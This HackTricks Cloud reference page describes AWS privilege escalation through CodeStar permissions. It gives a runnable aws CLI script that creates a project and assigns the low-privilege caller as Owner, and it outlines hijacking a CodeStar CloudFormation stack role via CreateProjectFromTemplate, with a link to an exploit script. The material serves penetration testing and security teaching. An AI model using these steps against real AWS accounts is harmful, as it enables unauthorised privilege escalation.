HackTricks CloudAWS - Codestar Privesc
Reading time: 3 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Codestar
You can find more information about codestar in:
codestar:CreateProject, codestar:AssociateTeamMember
iam:PassRole, codestar:CreateProject
With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:
iam:PassRole, codestar:CreateProject
codestar:CreateProject, codestar:AssociateTeamMember
This technique uses codestar:CreateProject to create a codestar project, and codestar:AssociateTeamMember to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions.
PROJECT_NAME="supercodestar"
aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME
echo "Waiting 1min to start the project"
sleep 60
USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed
If you are already a member of the project you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember
Potential Impact: Privesc to the codestar policy generated. You can find an example of that policy in:
codestar:CreateProject, codestar:AssociateTeamMember
codestar:CreateProjectFromTemplate
- Create a New Project:
- Utilize the
codestar:CreateProjectFromTemplateaction to initiate the creation of a new project.- Upon successful creation, access is automatically granted for
cloudformation:UpdateStack. - This access specifically targets a stack associated with the
CodeStarWorker-<generic project name>-CloudFormationIAM role.
- Upon successful creation, access is automatically granted for
- Utilize the
- Update the Target Stack:
- With the granted CloudFormation permissions, proceed to update the specified stack.
- The stack's name will typically conform to one of two patterns:
awscodestar-<generic project name>-infrastructureawscodestar-<generic project name>-lambda- The exact name depends on the chosen template (referencing the example exploit script).
- The stack's name will typically conform to one of two patterns:
- With the granted CloudFormation permissions, proceed to update the specified stack.
- Access and Permissions:
- Post-update, you obtain the capabilities assigned to the CloudFormation IAM role linked with the stack.
- Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
For more information check the original research: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/.
You can find the exploit in https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py
Potential Impact: Privesc to cloudformation IAM role.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.